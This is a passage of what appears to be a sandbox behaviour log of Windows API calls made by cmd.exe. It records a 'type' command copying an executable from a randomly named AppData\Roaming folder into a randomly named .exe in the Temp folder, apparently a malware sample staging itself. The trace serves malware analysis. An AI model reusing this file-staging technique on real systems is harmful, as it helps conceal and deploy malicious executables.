returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4aa44c40, cchData=32 | out: lpLCData="Sat") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4aa44c00, cchData=32 | out: lpLCData="Sun") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4aa44930, cchData=8 | out: lpLCData=".") returned 2 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4aa44920, cchData=8 | out: lpLCData=",") returned 2 [0107.046] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0107.047] GetConsoleTitleW (in: lpConsoleTitle=0x350a20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.047] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0107.047] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0107.047] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0107.047] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0107.048] _wcsicmp (_String1="type", _String2=")") returned 75 [0107.048] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0107.048] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0107.048] _wcsicmp (_String1="IF", _String2="type") returned -11 [0107.048] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0107.048] _wcsicmp (_String1="REM", _String2="type") returned -2 [0107.048] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0107.051] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"") returned 68 [0107.051] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"") returned 68 [0107.051] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"") returned 71 [0107.051] _wcsicmp (_String1="IF/?", 
_String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"") returned 71 [0107.051] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"") returned 80 [0107.051] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"") returned 80 [0107.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.054] GetFileType (hFile=0x7) returned 0x2 [0107.071] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.071] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f84c | out: lpMode=0x26f84c) returned 1 [0107.072] _dup (_FileHandle=1) returned 3 [0107.073] _close (_FileHandle=1) returned 0 [0107.073] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", _String2="con") returned -53 [0107.073] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f81c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0107.073] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0107.073] GetConsoleTitleW (in: lpConsoleTitle=0x26f64c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.074] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0107.074] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0107.074] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0107.074] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0107.074] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa45260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.074] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x26f1b0, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1b0) returned 0x350f78 [0107.075] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0107.075] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0107.075] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0107.075] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26e0bc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0107.075] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0107.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.075] GetFileType (hFile=0x54) returned 0x1 [0107.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.075] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26e114 | out: lpFileSizeHigh=0x26e114*=0x0) returned 0x7d600 [0107.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.075] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.075] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.076] GetFileType (hFile=0x4c) returned 0x1 [0107.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.076] GetFileType (hFile=0x4c) returned 0x1 [0107.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.076] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.077] GetFileType (hFile=0x4c) returned 0x1 [0107.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.077] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.077] GetFileType (hFile=0x4c) returned 0x1 [0107.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.077] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, 
lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.078] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.078] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.079] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.079] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, 
lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.080] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.080] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] GetFileType (hFile=0x4c) returned 0x1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] GetFileType (hFile=0x4c) returned 0x1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] GetFileType (hFile=0x4c) returned 0x1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] GetFileType (hFile=0x4c) returned 0x1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] GetFileType (hFile=0x4c) returned 0x1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.081] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.082] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.082] GetFileType (hFile=0x4c) returned 0x1 [0107.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.082] GetFileType (hFile=0x4c) returned 0x1 [0107.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.082] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.082] GetFileType (hFile=0x4c) returned 0x1 [0107.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.082] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.082] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.083] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.083] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: 
lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] 